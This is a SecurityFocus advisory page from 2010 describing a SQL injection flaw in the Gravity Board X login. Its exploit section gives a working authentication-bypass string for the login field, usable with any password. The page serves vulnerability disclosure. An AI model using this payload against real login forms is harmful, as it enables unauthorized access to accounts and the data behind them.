info
discussion
exploit
solution
references
Gravity Board X Login SQL Injection Vulnerability
No exploit is required.
The following demonstrates login credentials sufficient to exploit this vulnerability:
login: ' or isnull(1/0) /*
password: whatever
Privacy Statement
Copyright 2010, SecurityFocus